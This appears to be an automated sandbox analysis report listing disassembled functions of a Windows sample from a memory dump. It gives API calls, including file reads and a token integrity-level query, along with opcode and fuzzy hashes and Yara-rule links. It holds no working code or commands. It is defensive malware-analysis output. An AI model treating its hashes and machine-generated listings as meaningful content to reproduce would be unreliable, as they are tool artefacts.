                                                                                                    Function 0040A2D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040A2D9
                                                                                                      • Part of subcall function 004091F2: __EH_prolog.LIBCMT ref: 004091F7
                                                                                                      • Part of subcall function 004091F2: std::exception::exception.LIBCONCRT ref: 00409298
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$std::exception::exception
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 1037574509-410509341
                                                                                                    • Opcode ID: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
                                                                                                    • Instruction ID: d1b7aa20dfa380f05ae0c9d45f11c5fbc92261fe5dbcb6166fee3a439ce0bcbc
                                                                                                    • Opcode Fuzzy Hash: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
                                                                                                    • Instruction Fuzzy Hash: 1B21A972D00305AFCB159FA9D4405EAFBB1FF08308F10C56EE81AAB241D3759A01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004137E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004137E9
                                                                                                      • Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: NA
                                                                                                    • API String ID: 3519838083-2562218444
                                                                                                    • Opcode ID: deb12c88591d8418ead5c7fea2b7d9d5a2e1bbcaabf8effe3fcde7dc99f0f16e
                                                                                                    • Instruction ID: da25af750edcbdee1afc70327f05f7be60494842f1cb4fd143c88d520103cf3c
                                                                                                    • Opcode Fuzzy Hash: deb12c88591d8418ead5c7fea2b7d9d5a2e1bbcaabf8effe3fcde7dc99f0f16e
                                                                                                    • Instruction Fuzzy Hash: D1119171A05215AFDF15EFA9C8857DEBBB0AF08304F0080AFE509A7391C7749E04CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045480F, Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 83b7a4e06a2ee3636686dfd6c4150c8228ec29ee02efc1e0bce88711a1e88bfa
                                                                                                    • Instruction ID: 4ffbf3e4130ade14b820486fe366871abf97af72be88c4dd17790a7f1b7fa28f
                                                                                                    • Opcode Fuzzy Hash: 83b7a4e06a2ee3636686dfd6c4150c8228ec29ee02efc1e0bce88711a1e88bfa
                                                                                                    • Instruction Fuzzy Hash: 1241B436A002109FDB14DF79C881A5EB3A5EFC5718B25486DE905EF352DB34ED45CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004091F2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004091F7
                                                                                                    • std::exception::exception.LIBCONCRT ref: 00409298
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologstd::exception::exception
                                                                                                    • String ID:
                                                                                                    • API String ID: 2619619420-0
                                                                                                    • Opcode ID: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
                                                                                                    • Instruction ID: 4ca3936c078d54e57671f6f98a26ddc2dbffc98c2064a6f7f6a0a40424ae653c
                                                                                                    • Opcode Fuzzy Hash: f609cfb5bc4f61f6821307a2f6bf41c080323cdc5d5257e562f737a67b82de2d
                                                                                                    • Instruction Fuzzy Hash: 9E31F571D00208DFCB15EFA9C885ADEBBF4FF18314F14842EE415A7281E7789A85CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041FCB2, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
                                                                                                    • _strlen.LIBCMT ref: 0041FCD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 942933051-0
                                                                                                    • Opcode ID: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
                                                                                                    • Instruction ID: 4c7206307d1035eeeff1e9c0a0999dde91d7a809fbe3ac133bfd090c61ce09d6
                                                                                                    • Opcode Fuzzy Hash: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
                                                                                                    • Instruction Fuzzy Hash: 77014C726082055AE728977DB805BFB73E99B45724F20003FF857C7180EA68DCC7825C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00435484, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00435489
                                                                                                      • Part of subcall function 00435346: lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
                                                                                                      • Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353C0
                                                                                                      • Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353CC
                                                                                                    • _strlen.LIBCMT ref: 0043549D
                                                                                                      • Part of subcall function 004116B4: __EH_prolog.LIBCMT ref: 004116B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologlstrcpy$_strlenlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 27009005-0
                                                                                                    • Opcode ID: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
                                                                                                    • Instruction ID: 967c59de1264e5437e808e2dc9646ed90955aae641b5eab628f7aa89402fc85e
                                                                                                    • Opcode Fuzzy Hash: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
                                                                                                    • Instruction Fuzzy Hash: AC112570D00556EAEB19FB75DC52EEEBB359F50308F1081AEE00663243EB384B45CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043DDD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,0043E3C4,?), ref: 0043DE13
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
                                                                                                    • Instruction ID: 7b0ff4dd052904a3b23983b3bd9cd87b3b88dbabaee70fd5e41bad5e6d0b566c
                                                                                                    • Opcode Fuzzy Hash: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
                                                                                                    • Instruction Fuzzy Hash: B401B171A00B00AFE7214E3AACC6BA7FEE8FB69758F10413FF65686250C7B49C009625
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045DE8F, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0045DEB0
                                                                                                      • Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,00460732,?,00000004,?,?,?,?,00454898,?,?), ref: 0045DEEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1482568997-0
                                                                                                    • Opcode ID: 00041fd79c7851f27b0e68b3eb0dcacf61c0363111946136a0b870e2bb524d10
                                                                                                    • Instruction ID: ee3c06eaf39820f4ae1d5cae37682a81a055d57be0c00f7ec909b18ee53fb56b
                                                                                                    • Opcode Fuzzy Hash: 00041fd79c7851f27b0e68b3eb0dcacf61c0363111946136a0b870e2bb524d10
                                                                                                    • Instruction Fuzzy Hash: 92F0C832D00911669B316A17AC06F6B27188FA1773B10052BFC145E393DB3CD80955AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040ADBE, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADCA
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADDC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 478157137-0
                                                                                                    • Opcode ID: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
                                                                                                    • Instruction ID: a824447d2fdea08db754f01d1575c5cda49c6909b15693c7d8439b486d980dbb
                                                                                                    • Opcode Fuzzy Hash: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
                                                                                                    • Instruction Fuzzy Hash: DBE0803110424577DF015A13DD0196B7717FF91355B10103BFD0456991D775DC7165D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042B76D, Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042B772
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3708980276-0
                                                                                                    • Opcode ID: 1b659ef9ada243c074bba1421181e30634da3ff914e4ef7b6375e4b602981ca4
                                                                                                    • Instruction ID: 961e30c5faa2a638eb1dabf367997125721a18bc80a6a3d51cdc21dae2d9d728
                                                                                                    • Opcode Fuzzy Hash: 1b659ef9ada243c074bba1421181e30634da3ff914e4ef7b6375e4b602981ca4
                                                                                                    • Instruction Fuzzy Hash: BA819C70D012AC9ADB01DFE9DA811ECFBB0FF6A308F50925EE84477252DB740A89CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413B98, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: de33ff3e108b7e4f9c8a3d8cbf6b278f497d8bb1b6fa7cf3d498205f389bd609
                                                                                                    • Instruction ID: 1590526c6e7a1ea769188aa884af5b1b43062d79938ce3292021d864919962f1
                                                                                                    • Opcode Fuzzy Hash: de33ff3e108b7e4f9c8a3d8cbf6b278f497d8bb1b6fa7cf3d498205f389bd609
                                                                                                    • Instruction Fuzzy Hash: A851B135A045059FCB24CFACC5C08EDBBB1BF48715B24425AE525AB392E734EE81CB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041F1D7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F207
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
                                                                                                    • Instruction ID: 7a39a49cf585f4d0e46ac43e0a9d888c8851a94b0eff99b2d07aad98a01891d0
                                                                                                    • Opcode Fuzzy Hash: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
                                                                                                    • Instruction Fuzzy Hash: 0B310679F04205ABDF14CAA5C8406EEBBA5AB41320F2441BFE501E73C1DA799DCA8748
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004235F2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004235F7
                                                                                                      • Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                      • Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                      • Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
                                                                                                      • Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                      • Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                      • Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92
                                                                                                      • Part of subcall function 004206DD: __EH_prolog.LIBCMT ref: 004206E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2888657697-0
                                                                                                    • Opcode ID: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
                                                                                                    • Instruction ID: cd57585f92f4651694f3437ef3a0fe2b6c7561e3377806dc9b6083a3b3dba577
                                                                                                    • Opcode Fuzzy Hash: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
                                                                                                    • Instruction Fuzzy Hash: 6B3189B1D04269EFCF04EFA6D591AEDFB70BF58308F60445EE40167242DB786A48CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413886, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041388B
                                                                                                      • Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 0f94c02e4d9d5934161937f5216b40a4951dad0b1987de665361ea5d9a30780b
                                                                                                    • Instruction ID: e0e9e3466cc930e456ed994cce60529752f33af2ff264595590bafee3097d804
                                                                                                    • Opcode Fuzzy Hash: 0f94c02e4d9d5934161937f5216b40a4951dad0b1987de665361ea5d9a30780b
                                                                                                    • Instruction Fuzzy Hash: 70219DB1A013149FDB65DF69C88479ABBF0AF08304F0084AED50AA7792D775AE04CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043E0F8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0043E75E,?,00004000), ref: 0043E163
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
                                                                                                    • Instruction ID: b8c3acaed76ea71400faf53aace5318325b6ba4514e0b8ac76d2e751ebdd2552
                                                                                                    • Opcode Fuzzy Hash: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
                                                                                                    • Instruction Fuzzy Hash: 9B119A31601515FBDB05DF26C804A9ABBB9FF08764F10811AF86897250DB30FE61DBD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A8FE, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
                                                                                                    • Instruction ID: f3ba4f7996b305dadc24657f6488ca3712718daac0c1ff3c745a6b17617cb164
                                                                                                    • Opcode Fuzzy Hash: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
                                                                                                    • Instruction Fuzzy Hash: 8E1148B1A0420AAFCF05DF58E94198F7BF4EF48304F05406AF805EB352D634DA25CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041EFFF, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
                                                                                                    • Instruction ID: 941fd2b4e4699c03d34950e30c923efa3b28c70746c31d4bc35f3efe690fa374
                                                                                                    • Opcode Fuzzy Hash: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
                                                                                                    • Instruction Fuzzy Hash: 4A01A7B0A04204AFDB348E14CC40BF23F99EB59358F34847BE005CD243D26ADDCB9A59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041F06A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041F292,00000001,00000000,?,00000000,00000244), ref: 0041F090
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
                                                                                                    • Instruction ID: b2856fa76417eeaae25239adddc27ac655f403bf8eafa223ee5e10a7ae46ea81
                                                                                                    • Opcode Fuzzy Hash: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
                                                                                                    • Instruction Fuzzy Hash: 3D019E31600105BFE708CF19D881AA6BBB9FB84304F04822AE40587651E3B1BD948BD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00445166, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c10b69d44c97dbcf14d5388cbbc4fa0e2f8884e1fcda296225b85c0e2ab4cd50
                                                                                                    • Instruction ID: 13684ca19e7c19ffe86e0d6c3d5b9d4de08ff2cfd1c634039dab65eabff4720b
                                                                                                    • Opcode Fuzzy Hash: c10b69d44c97dbcf14d5388cbbc4fa0e2f8884e1fcda296225b85c0e2ab4cd50
                                                                                                    • Instruction Fuzzy Hash: CEF0A932901E1457EE31666A9C05B5B32989F42379F25071FFD24922D3DF7CE80A869E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00420568, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042056D
                                                                                                      • Part of subcall function 0041FCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
                                                                                                      • Part of subcall function 0041FCB2: _strlen.LIBCMT ref: 0041FCD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryH_prolog_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1906034785-0
                                                                                                    • Opcode ID: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
                                                                                                    • Instruction ID: 8f4f766da947a39cfd01fa68859b9d028871f64d1bddd01dbdfe974dcb1ef4d4
                                                                                                    • Opcode Fuzzy Hash: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
                                                                                                    • Instruction Fuzzy Hash: BA01AC71611702AFD3449F399C857AABAE8FF45324F10432FE025D72D2DB789941CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AA9C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040A9DC: __EH_prolog.LIBCMT ref: 0040A9E1
                                                                                                      • Part of subcall function 0040A9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$___std_fs_directory_iterator_open@12
                                                                                                    • String ID:
                                                                                                    • API String ID: 1512400408-0
                                                                                                    • Opcode ID: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
                                                                                                    • Instruction ID: e377c236dd62adbf3a3ef1934febb3bb85398013c8040f262c9f5580056daf97
                                                                                                    • Opcode Fuzzy Hash: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
                                                                                                    • Instruction Fuzzy Hash: EE0161719057059FCB28DF69819069FBBF4AF04314F10462FE49693381D7745A44CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00464160, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 8a0f504226b4e52ffc8cafcadc5f391c652f32d10181acd8a8481b9566ecf181
                                                                                                    • Instruction ID: 027a2c0be38452a1ce383e2f5702291adaac393c38664a96b0ec204eb3fac7d3
                                                                                                    • Opcode Fuzzy Hash: 8a0f504226b4e52ffc8cafcadc5f391c652f32d10181acd8a8481b9566ecf181
                                                                                                    • Instruction Fuzzy Hash: B9018F72C04119BFCF01AFA88C059EE7FB5BF48314F14416AFD14E21A1E6358A60DB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004129C7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004129CC
                                                                                                      • Part of subcall function 00413DA4: __EH_prolog.LIBCMT ref: 00413DA9
                                                                                                      • Part of subcall function 00413DA4: std::_Lockit::_Lockit.LIBCPMT ref: 00413DB7
                                                                                                      • Part of subcall function 00413DA4: int.LIBCPMT ref: 00413DCE
                                                                                                      • Part of subcall function 00413DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1350124489-0
                                                                                                    • Opcode ID: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
                                                                                                    • Instruction ID: c434b697f8c53097445019a40e5bb927d44771b075c49f0c0e8e2ea380da5454
                                                                                                    • Opcode Fuzzy Hash: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
                                                                                                    • Instruction Fuzzy Hash: 8701A771A20110DFD755EB55CA05BEE73E4EF08705F00402EB405E7292DBB8EE50CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045850D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
